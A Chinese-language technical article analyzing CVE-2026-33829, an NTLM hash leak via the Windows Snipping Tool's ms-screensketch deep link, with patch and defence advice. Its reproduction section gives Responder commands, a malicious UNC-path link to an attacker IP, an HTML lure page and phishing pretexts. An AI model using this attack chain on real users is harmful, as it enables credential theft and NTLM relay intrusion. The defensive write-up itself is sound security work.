当前位置: 首页 > article >正文

截图工具成“内鬼“:CVE-2026-33829 NTLM哈希泄露漏洞深度解析与防御指南

引言2026年4月14日微软在月度补丁星期二更新中修复了一个看似不起眼却暗藏巨大风险的漏洞——Windows截图工具(Snipping Tool)中的NTLM凭据哈希泄露漏洞(CVE-2026-33829)。这个CVSS评分仅为4.3的中危漏洞却因为其极低的利用门槛、广泛的影响范围和与社会工程学的完美结合迅速成为全球安全界关注的焦点。作为Windows系统预装率最高的工具之一截图工具几乎存在于每一台Windows 10和Windows 11设备上。攻击者只需构造一个看似无害的链接诱导用户点击就能在用户完全无感知的情况下窃取其Net-NTLM哈希凭据。这些凭据一旦落入攻击者手中不仅可以被离线破解获取明文密码还能直接用于NTLM中继攻击进而渗透整个企业内网。本文将从技术原理、攻击链复现、危害分析、修复方案和防御策略等多个维度对CVE-2026-33829进行全面深入的解析并探讨Windows深度链接协议安全和NTLM协议淘汰的未来趋势。一、漏洞概述1.1 基本信息漏洞编号CVE-2026-33829漏洞类型欺骗漏洞/敏感信息泄露(CWE-200)CVSS 3.1评分4.3(中危)披露方Black Arrow安全研究团队(研究员Margaruga)公开时间2026年4月14日(与微软补丁同步发布)POC状态已公开EXP状态未公开1.2 影响范围该漏洞影响所有预装了受影响版本截图工具的Windows系统包括Windows 10 Version 1809及以上所有版本Windows 11所有版本Windows Server 2012 R2及以上版本(Server Core安装)值得注意的是Windows 10已于2025年10月停止主流支持但微软仍为企业用户提供扩展安全更新(ESU)服务。对于未购买ESU服务的Windows 10用户该漏洞将成为永久性安全风险。1.3 漏洞时间线2026年3月23日Black Arrow安全团队向微软报告该漏洞2026年4月14日微软发布安全补丁同时公开漏洞细节和POC代码2026年4月15日多家安全厂商发布漏洞预警和复现报告2026年4月20日360漏洞研究院发布完整复现细节和修复方案二、技术原理深度分析2.1 Windows深度链接协议(URI Scheme)工作机制要理解这个漏洞首先需要了解Windows深度链接协议(也称为URI Scheme)的工作原理。深度链接是一种允许应用程序通过特定格式的URL直接被调用并执行特定操作的机制。例如我们在浏览器中点击mailto:exampledomain.com会自动打开邮件客户端点击tel:1234567890会自动打开电话应用。Windows系统通过注册表来管理深度链接协议与应用程序之间的映射关系。当用户点击一个包含特定协议的URL时浏览器会查询注册表中对应的应用程序路径并将URL参数传递给该应用程序执行。这种机制极大地提升了用户体验但同时也带来了严重的安全风险。如果应用程序在处理传递过来的参数时没有进行严格的输入验证攻击者就可以构造恶意参数诱导应用程序执行非预期的操作。2.2 ms-screensketch协议的设计与实现Windows截图工具注册了两个深度链接协议ms-screenclip和ms-screensketch。其中ms-screensketch协议用于直接打开截图工具并编辑指定的图片文件。该协议的标准格式如下ms-screensketch:edit?filePath文件路径isTemporary布尔值saved布尔值source来源正常情况下filePath参数应该指向本地文件系统中的一个图片文件例如ms-screensketch:edit?filePathC:\Users\Username\Pictures\screenshot.pngisTemporaryfalsesavedtruesourceToast当用户点击这个链接时截图工具会自动启动并加载指定路径下的图片文件进行编辑。2.3 漏洞根源filePath参数输入验证缺失CVE-2026-33829的根本原因在于截图工具在处理filePath参数时没有进行充分的输入验证特别是没有过滤掉UNC(Universal Naming Convention)路径。UNC路径是Windows系统中用于访问网络共享资源的一种路径格式其标准格式为\\服务器名或IP地址\共享名\文件名当Windows系统尝试访问一个UNC路径时会自动向目标服务器发起SMB(Server Message Block)连接请求并在连接过程中进行NTLM身份认证将当前用户的Net-NTLM哈希凭据发送给目标服务器。攻击者正是利用了这一点将filePath参数设置为指向自己控制的SMB服务器的UNC路径ms-screensketch:edit?filePath\\attacker-smb-server\file.pngisTemporaryfalsesavedtruesourceToast当用户点击这个恶意链接时截图工具会正常启动看起来就像在加载一个普通的图片文件。但在后台截图工具会尝试通过SMB协议连接攻击者控制的服务器从而将用户的Net-NTLM哈希凭据泄露给攻击者。2.4 SMB协议与NTLM认证流程为了更深入地理解漏洞危害我们需要简要了解一下SMB协议和NTLM认证的工作流程客户端发起连接请求客户端向服务器发送SMB连接请求服务器发送挑战服务器生成一个随机的8字节挑战值(Challenge)发送给客户端客户端生成响应客户端使用用户的密码哈希对挑战值进行加密生成NTLM响应(Response)发送给服务器服务器验证响应服务器使用自己存储的用户密码哈希对挑战值进行同样的加密然后与客户端发送的响应进行比较。如果两者一致则认证成功在这个过程中客户端发送的Net-NTLM哈希包含了用户名、域名、挑战值和加密后的响应。攻击者捕获到这个哈希后不需要知道明文密码就可以进行以下两种攻击离线破解使用彩虹表或暴力破解工具尝试恢复明文密码NTLM中继攻击将捕获的哈希转发给其他服务器冒充用户进行身份认证三、完整攻击链复现3.1 环境准备攻击机Kali Linux 2026.1(预装Responder和Impacket工具)靶机Windows 11 22H2(未安装2026年4月补丁)网络环境攻击机和靶机在同一局域网内3.2 步骤1配置Responder工具Responder是一个用于捕获NTLM哈希的常用工具它可以模拟SMB、HTTP、FTP等多种服务器等待客户端发起连接并捕获认证凭据。在Kali Linux中首先编辑Responder的配置文件sudonano/etc/responder/responder.conf确保以下配置项已启用SMB On HTTP On HTTPS On DNS On LDAP On然后启动Respondersudoresponder-Ieth0-wrf其中-I eth0指定监听的网络接口-w启动HTTP服务器-r启用LLMNR/NBT-NS投毒-f启用指纹识别3.3 步骤2构造恶意链接根据公开的POC构造指向攻击机IP地址的恶意链接ms-screensketch:edit?filePath\\192.168.1.100\file.pngisTemporaryfalsesavedtruesourceToast将这个链接嵌入到一个HTML页面中以便通过浏览器触发!DOCTYPEhtmlhtmlbodyh1点击查看精彩图片/h1ahrefms-screensketch:edit?filePath\\192.168.1.100\file.pngisTemporaryfalsesavedtruesourceToast点击这里/a/body/html将这个HTML文件托管在一个Web服务器上或者直接发送给受害者。3.4 步骤3诱导用户点击链接通过社会工程学手段例如发送钓鱼邮件、在社交媒体上分享链接、或者入侵合法网站并植入恶意链接诱导受害者点击。当受害者在Windows系统中点击这个链接时浏览器会弹出一个确认对话框询问是否允许打开截图工具。由于截图工具是系统自带的可信应用大多数用户会毫不犹豫地点击允许。3.5 步骤4捕获Net-NTLM哈希一旦用户点击允许截图工具会立即启动并在后台尝试连接攻击机的SMB服务器。Responder会捕获到这个连接请求并记录下用户的Net-NTLMv2哈希[SMBv2] NTLMv2-SSP Client : 192.168.1.101 [SMBv2] NTLMv2-SSP Username : DESKTOP-ABC123\John [SMBv2] NTLMv2-SSP Hash : John::DESKTOP-ABC123:1122334455667788:9A8B7C6D5E4F3A2B1C0D9E8F7A6B5C4D:0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF至此攻击者已经成功窃取了受害者的Net-NTLM哈希凭据。整个过程中受害者只会看到截图工具正常启动不会有任何其他异常提示因此很难察觉到自己的凭据已经泄露。四、漏洞危害深度解析虽然CVE-2026-33829的CVSS评分仅为4.3被归类为中危漏洞但在实际应用场景中其危害程度远不止于此。4.1 离线破解风险攻击者捕获到Net-NTLM哈希后可以使用John the Ripper、Hashcat等工具进行离线破解。对于弱密码破解过程可能只需要几秒钟到几分钟。即使是强密码随着GPU计算能力的不断提升和彩虹表技术的发展破解成功率也在不断提高。特别是在2026年1月谷歌旗下的Mandiant公司发布了完整的Net-NTLMv1彩虹表数据库将NTLMv1密码的破解时间从原来的几天缩短到了12小时以内。虽然CVE-2026-33829泄露的是Net-NTLMv2哈希但这也预示着NTLM协议的安全性正在不断下降。4.2 NTLM中继攻击比离线破解更危险的是NTLM中继攻击。攻击者不需要破解哈希只需将捕获的Net-NTLM哈希转发给网络中的其他服务器就可以冒充用户进行身份认证获取对这些服务器的访问权限。NTLM中继攻击的危害程度取决于被攻击用户的权限。如果被攻击用户是域管理员攻击者甚至可以直接控制整个域控制器接管整个企业网络。即使是普通域用户攻击者也可以利用其权限访问文件共享、读取敏感数据、安装恶意软件并进一步进行横向移动最终获取更高权限。4.3 企业内网渗透威胁对于企业环境来说CVE-2026-33829是一个极其危险的突破口。攻击者可以通过钓鱼邮件向企业员工发送恶意链接一旦有员工点击攻击者就能获取该员工的凭据进而渗透进入企业内网。更可怕的是这种攻击方式非常隐蔽。由于截图工具是系统自带的可信应用大多数安全软件不会对其行为进行严格监控。而且攻击过程中不会产生任何恶意文件传统的基于特征码的杀毒软件很难检测到这种攻击。4.4 社会工程学结合的攻击场景CVE-2026-33829的最大特点是与社会工程学的完美结合。攻击者可以构造各种具有欺骗性的场景来诱导用户点击链接发送请查看我刚截的会议记录的钓鱼邮件在即时通讯工具中发送这是我们上次活动的照片在论坛或社交媒体上分享点击查看高清大图入侵合法网站并在图片链接中植入恶意代码由于这些场景在日常生活中非常常见用户的警惕性会大大降低攻击成功率也会相应提高。五、微软修复方案分析微软在2026年4月14日的安全更新中修复了CVE-2026-33829漏洞。修复方案的核心是在截图工具中增加了对filePath参数的严格输入验证禁止其接受UNC路径。具体来说微软在截图工具的代码中添加了以下检查验证filePath参数是否为本地文件系统路径过滤掉所有以\开头的UNC路径禁止访问网络共享资源用户可以通过以下方式安装补丁打开Windows设置进入Windows更新页面点击检查更新手动下载并安装对应版本的补丁https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829对于无法立即安装补丁的用户微软提供了以下临时缓解措施禁用ms-screensketch和ms-screenclip协议在网络边界阻断出站SMB流量(端口445)启用SMB签名六、防御策略与最佳实践6.1 个人用户防御立即安装安全补丁这是最有效的防御措施。确保你的Windows系统已经安装了2026年4月14日的所有安全更新。提高防钓鱼意识不要点击来自陌生人或不可信来源的链接特别是那些要求打开应用程序的链接。使用强密码使用包含大小写字母、数字和特殊字符的强密码并定期更换。这可以增加攻击者离线破解的难度。启用多因素认证(MFA)在所有支持的服务上启用多因素认证。即使攻击者窃取了你的密码哈希没有第二因素认证也无法登录你的账户。6.2 企业级防御批量部署补丁使用WSUS或其他补丁管理工具在企业内部批量部署安全补丁确保所有终端都得到及时修复。加强内网监控部署入侵检测系统(IDS)和安全信息与事件管理(SIEM)系统重点监控异常的出站SMB连接和NTLM认证请求。阻断出站SMB流量在网络边界防火墙中阻断所有出站的SMB流量(端口139和445)防止内部主机向外部恶意服务器发起SMB连接。强制启用SMB签名在所有服务器和客户端上强制启用SMB签名。这可以有效防止NTLM中继攻击。禁用LLMNR和NBT-NS在企业网络中禁用LLMNR(链路本地多播名称解析)和NBT-NS(NetBIOS名称服务)防止攻击者进行名称解析投毒。加强员工安全培训定期对员工进行安全培训提高他们对钓鱼攻击的识别能力和防范意识。6.3 深度链接安全设计原则CVE-2026-33829暴露了Windows深度链接协议的安全风险。对于应用程序开发者来说在设计和实现深度链接功能时应遵循以下安全原则严格输入验证对所有通过深度链接传递的参数进行严格的输入验证过滤掉所有可能包含恶意内容的字符和格式。最小权限原则应用程序在处理深度链接请求时应使用最小必要的权限运行避免以管理员权限执行操作。用户确认机制对于可能涉及敏感操作的深度链接应强制要求用户进行二次确认明确告知用户将要执行的操作。白名单机制只允许深度链接访问预先定义好的安全资源禁止访问任意文件或执行任意命令。安全审计记录所有深度链接的调用日志以便在发生安全事件时进行追溯和分析。七、前瞻性思考7.1 NTLM协议的淘汰进程CVE-2026-33829再次凸显了NTLM协议的安全缺陷。作为一个诞生于1993年的老旧认证协议NTLM已经存在了33年其设计上的安全漏洞层出不穷。微软已经意识到了这个问题并在2026年1月宣布了NTLM协议的三步走淘汰计划第一阶段(2026年上半年)在Windows 11中默认禁用NTLMv1协议第二阶段(2026年下半年)在Windows 11中默认禁用NTLMv2协议仅保留Kerberos作为默认认证协议第三阶段(2027年)在所有Windows版本中完全移除NTLM协议支持这一计划标志着NTLM协议即将退出历史舞台。但由于大量遗留系统和应用程序仍然依赖NTLM协议这个淘汰过程将会非常漫长和复杂。在未来几年内NTLM相关的安全漏洞仍将是网络攻击的主要目标之一。7.2 Windows深度链接安全的未来CVE-2026-33829并不是第一个利用Windows深度链接协议的漏洞也不会是最后一个。近年来已经有多个应用程序因为深度链接处理不当而被曝出安全漏洞包括Microsoft Edge、Google Chrome、Adobe Reader等知名软件。随着深度链接技术的广泛应用其安全问题也越来越受到关注。微软正在考虑对Windows深度链接机制进行全面的安全改进包括引入更严格的权限控制机制建立统一的深度链接安全审核平台增加对恶意深度链接的实时检测和拦截功能提供更详细的用户提示和警告信息这些改进将有助于提高Windows系统的整体安全性但同时也需要应用程序开发者的积极配合共同构建一个更安全的深度链接生态系统。7.3 遗留系统的安全挑战对于企业来说最大的安全挑战来自于遗留系统。Windows 10已于2025年10月停止主流支持大量企业仍然在使用这些系统并且很多企业没有购买扩展安全更新服务。这些未打补丁的遗留系统将成为攻击者的主要目标。CVE-2026-33829这样的漏洞在这些系统上将永远存在无法得到修复。企业需要制定详细的系统升级计划逐步淘汰老旧系统同时采取必要的安全防护措施如网络隔离、访问控制、入侵检测等来降低遗留系统带来的安全风险。八、总结CVE-2026-33829是一个典型的小漏洞大危害案例。一个看似普通的截图工具因为一个简单的输入验证缺失就可能导致用户身份凭据泄露进而引发整个企业内网的安全危机。这个漏洞再次提醒我们网络安全没有小事。即使是最常用、最不起眼的系统工具也可能成为攻击者的突破口。无论是个人用户还是企业用户都应该高度重视这个漏洞立即采取必要的防护措施。从长远来看NTLM协议的淘汰是不可避免的趋势。企业应该提前做好准备逐步将认证系统迁移到更安全的Kerberos协议。同时应用程序开发者也应该加强安全意识在设计和实现过程中严格遵循安全开发规范避免类似的安全漏洞再次发生。网络安全是一场永无止境的攻防战。只有不断提高安全意识加强安全防护才能在这场战争中立于不败之地。

相关文章:

截图工具成“内鬼“:CVE-2026-33829 NTLM哈希泄露漏洞深度解析与防御指南

引言 2026年4月14日,微软在月度补丁星期二更新中修复了一个看似不起眼却暗藏巨大风险的漏洞——Windows截图工具(Snipping Tool)中的NTLM凭据哈希泄露漏洞(CVE-2026-33829)。这个CVSS评分仅为4.3的"中危"漏洞,却因为其极低的利用门槛、广泛的…...

MYSQL——基础知识(SQL的临时表和克隆表)

目录 前言 一、MySQL 临时表:会话级的“草稿纸” 二、MySQL 克隆表:完整复制表结构与数据 三、临时表 vs 克隆表:对比总结 四、最佳实践建议 五、总结 前言 在 MySQL 开发与运维中,临时表(Temporary Table&…...

基于LangChain构建AI社交媒体智能体:自动化内容发布与互动实践

1. 项目概述:一个能帮你打理社交媒体的AI智能体最近在GitHub上看到一个挺有意思的项目,叫langchain-ai/social-media-agent。光看名字,你大概就能猜到它的核心功能:一个基于LangChain框架构建的、能够自动化处理社交媒体任务的AI智…...

告别混乱的Excel表格:我是如何用NetBox + Python脚本实现网络资产自动化管理的

从Excel到NetBox:网络资产管理的自动化革命 凌晨三点,我盯着屏幕上第37个版本的IP地址分配表,突然意识到自己陷入了数据地狱——这份由五个同事轮流维护的Excel表格里,相同的设备出现了三种命名规则,某个网段的子网掩…...

保姆级教程:用Python+OpenCV玩转双目视觉,从相机标定到SGBM立体匹配全流程

PythonOpenCV双目视觉实战:从标定到深度图生成的避坑指南 刚接触双目视觉时,我对着两个摄像头拍出的图像发愁——明明是人眼轻松实现的立体感知,用代码实现却处处是坑。本文将带你用Python和OpenCV搭建完整的双目视觉流水线,从相机…...

告别黑屏!手把手教你用ZYNQ PS端库函数正确驱动VDMA,搞定OV5640实时显示

从寄存器到库函数:ZYNQ VDMA驱动开发的进阶实践 在ZYNQ平台上实现OV5640摄像头到LCD屏幕的实时显示,VDMA(Video Direct Memory Access)配置是关键环节。许多开发者习惯直接操作寄存器,这种方式直观但维护性差&#xff…...

如何快速掌握开源思源宋体:开发者的终极免费字体解决方案

如何快速掌握开源思源宋体:开发者的终极免费字体解决方案 【免费下载链接】source-han-serif-ttf Source Han Serif TTF 项目地址: https://gitcode.com/gh_mirrors/so/source-han-serif-ttf 还在为中文排版设计寻找合适的字体而烦恼吗?Source Ha…...

Prometheus告警规则进阶:精准规避Kubernetes Pod启动误报

1. 为什么Pod启动会触发误报警? 在Kubernetes集群中部署应用时,最让人头疼的问题之一就是频繁收到Pod启动阶段的误报警。这个问题我深有体会,特别是在负责算法服务集群维护的那段时间。每次发版后,手机就会收到一堆告警通知&#…...

MusicFreePlugins:打破音乐平台壁垒的终极免费聚合方案

MusicFreePlugins:打破音乐平台壁垒的终极免费聚合方案 【免费下载链接】MusicFreePlugins MusicFree播放插件 项目地址: https://gitcode.com/gh_mirrors/mu/MusicFreePlugins 厌倦了在不同音乐应用间频繁切换?受够了VIP会员墙和地域版权限制&am…...

MusicFreePlugins:打破音乐平台壁垒,打造你的专属音乐聚合器

MusicFreePlugins:打破音乐平台壁垒,打造你的专属音乐聚合器 【免费下载链接】MusicFreePlugins MusicFree播放插件 项目地址: https://gitcode.com/gh_mirrors/mu/MusicFreePlugins 还在为音乐版权限制和VIP付费墙烦恼吗?MusicFreePl…...

AWDP防御效率翻倍秘籍:手把手教你写自动化Patch脚本(附PHP/Python/Go/Node.js模板)

AWDP防御效率翻倍秘籍:手把手教你写自动化Patch脚本(附PHP/Python/Go/Node.js模板) 在AWDP这类高强度攻防对抗赛中,防御环节的效率往往决定了最终排名。当其他队伍还在手动上传补丁时,你的团队已经通过自动化脚本完成…...

一篇搞定git

1. Git概述 1.1 Git简介 Git 是一个分布式版本控制工具,通常用来对软件开发过程中的源代码文件进行管理。通过Git 仓库来存储和管理这些文件,Git 仓库分为两种: 本地仓库:开发人员自己电脑上的 Git 仓库 远程仓库:远…...

Beyond the WORM with MinIO object storage

I find the terminology of WORM (Write Once Read Many) coming back into the IT speak in recent years. In the era of rip and burn, WORM was a natural thing where many of us “youngsters” used to copy files to a blank CD or DVD. I got know about how WORM wor…...

Hermes Agent简介

1、Hermes Agent 是什么?Hermes Agent 是由 Nous Research 在 2026 年 2 月开源发布的一款自进化 AI 智能体框架,采用 MIT 协议,完全免费可商用 。它的核心定位不是简单的聊天机器人或代码补全工具,而是一个部署在你自己服务器上、…...

从路由器到服务器:OpenWRT、Yocto、Buildroot与Ubuntu的嵌入式与通用之路

1. 嵌入式与通用系统的技术光谱 当你面对一个物联网设备开发项目时,第一个要解决的问题往往是:该选择哪种操作系统或构建框架?这个问题没有标准答案,关键在于理解你的项目在"嵌入式-通用"这个技术光谱上的位置。我做了1…...

FP8浮点运算原理与深度学习优化实践

1. FP8浮点运算基础与设计原理在深度学习和大规模矩阵运算领域,浮点计算精度的选择一直是性能与准确率权衡的关键。传统FP32(单精度)和FP16(半精度)虽然能提供足够的数值精度,但在计算密集场景下存在明显的…...

欧姆龙NJ/NX系列PLC FINS通信实战:在Ignition SCADA中配置数据采集的完整流程

欧姆龙NJ/NX系列PLC FINS通信实战:在Ignition SCADA中配置数据采集的完整流程 工业自动化系统的核心在于设备间的无缝通信。作为欧姆龙新一代控制器的代表,NJ/NX系列PLC凭借其高性能和可靠性,在智能制造领域占据重要地位。而FINS协议作为欧姆…...

Windows 电脑安装安卓应用的轻量级解决方案:APK 安装器

Windows 电脑安装安卓应用的轻量级解决方案:APK 安装器 【免费下载链接】APK-Installer An Android Application Installer for Windows 项目地址: https://gitcode.com/GitHub_Trending/ap/APK-Installer 你是否曾希望在 Windows 电脑上运行安卓应用&#x…...

告别死板ALV:手把手教你用ABAP为报表添加智能双击交互(含代码复用技巧)

告别死板ALV:手把手教你用ABAP为报表添加智能双击交互(含代码复用技巧) 在SAP开发领域,ALV报表作为数据展示的标准组件,其交互体验直接影响用户效率。传统ALV双击事件处理往往陷入"一次开发,无法复用&…...

VSCode打造车规级开发环境:从AUTOSAR兼容配置到CANoe集成调试,12步零错误落地实录

更多请点击: https://intelliparadigm.com 第一章:VSCode车载开发环境的战略定位与车规级意义 在智能网联汽车加速落地的背景下,VSCode 已超越传统编辑器角色,演变为符合 ISO 26262 ASIL-B 级别开发要求的轻量化集成开发平台。其…...

探究 libhv Socketpair 在 clumsy 模拟延迟下的“超时”之谜

前言在进行网络编程开发时,我们经常使用 libhv 这种高性能的网络库,并利用 clumsy 等工具模拟弱网环境。最近在 Windows 环境下,当开启 clumsy 的 inbound 和 outbound 双向延迟(20ms)时,发现 libhv 的 Soc…...

2026 年 5 月・高项第 7 章 立项管理|精准预测 + 必刷练习题

一、2026 年 5 月 必考预测(5 题稳稳覆盖) 立项管理完整流程(排序题必考) 项目建议书 4 大核心内容(单选 / 多选) 四大可行性:技术 / 经济 / 法律 / 社会(场景判断题必考 1 题) 初步可行性 vs 详细可行性(精度、作用、是否可省略) 成本效益指标:投资回收期、NPV、I…...

自托管AI智能体平台Blink:从架构设计到生产部署实战

1. 项目概述:一个自托管的AI智能体平台最近在折腾一个挺有意思的项目,叫Blink。简单来说,它是一个让你能在自己服务器上搭建、运行和管理AI智能体的平台。你可以把它想象成一个“智能体操作系统”,它负责把智能体部署成Docker容器…...

Layerdivider终极指南:3步将单图转为专业PSD分层文件

Layerdivider终极指南:3步将单图转为专业PSD分层文件 【免费下载链接】layerdivider A tool to divide a single illustration into a layered structure. 项目地址: https://gitcode.com/gh_mirrors/la/layerdivider 你是否厌倦了在Photoshop中手动分离图像…...

从FreeRTOS转RT-Thread,线程创建这几点差异新手最容易踩坑

从FreeRTOS转RT-Thread:线程创建的关键差异与实战避坑指南 嵌入式开发者常面临RTOS迁移的场景,而FreeRTOS与RT-Thread作为两大主流选择,其线程管理机制存在显著差异。本文将深入剖析线程创建环节的五个核心差异点,通过对比表格、代…...

本地LLM智能搜索聚合器:构建私有化AI搜索工具

1. 项目概述:一个完全本地的、由LLM驱动的智能搜索聚合器 如果你和我一样,对当前主流搜索引擎和AI助手的“信息过滤”感到不安,或者单纯想拥有一个完全私密、不受任何外部API限制的自主信息检索工具,那么LLocalSearch这个项目绝对…...

从RKE到PKE:你的车钥匙是如何‘变聪明’的?一次讲清低频唤醒与双向认证

从RKE到PKE:智能车钥匙的技术革命与安全进化 车钥匙的智能化演进,本质上是一场关于用户体验与安全性的双重革命。十年前,我们还在习惯性地按下钥匙按钮解锁车辆;如今,只需轻触门把手甚至直接拉开车门,车辆就…...

如何永久保存微信聊天记录:WeChatMsg数据留存与隐私保护终极指南

如何永久保存微信聊天记录:WeChatMsg数据留存与隐私保护终极指南 【免费下载链接】WeChatMsg 提取微信聊天记录,将其导出成HTML、Word、CSV文档永久保存,对聊天记录进行分析生成年度聊天报告 项目地址: https://gitcode.com/GitHub_Trendin…...

手把手教你用ESP8266(NodeMCU)的I2C接口同时读取温湿度、光照和空气质量传感器

用ESP8266打造多传感器环境监测系统:I2C接口实战指南 在智能家居和物联网项目中,环境数据采集是最基础也最关键的环节之一。想象一下,当你希望用一个设备同时监测房间的温度、湿度、光照和空气质量时,如何优雅地解决多个传感器的集…...

GoWxDump:当取证技术遇上Go语言的优雅之美

GoWxDump:当取证技术遇上Go语言的优雅之美 【免费下载链接】GoWxDump 删库 项目地址: https://gitcode.com/gh_mirrors/go/GoWxDump 在一个数字取证专家的日常工作中,微信聊天记录往往成为关键证据的宝库。想象一下这样的场景:调查人员…...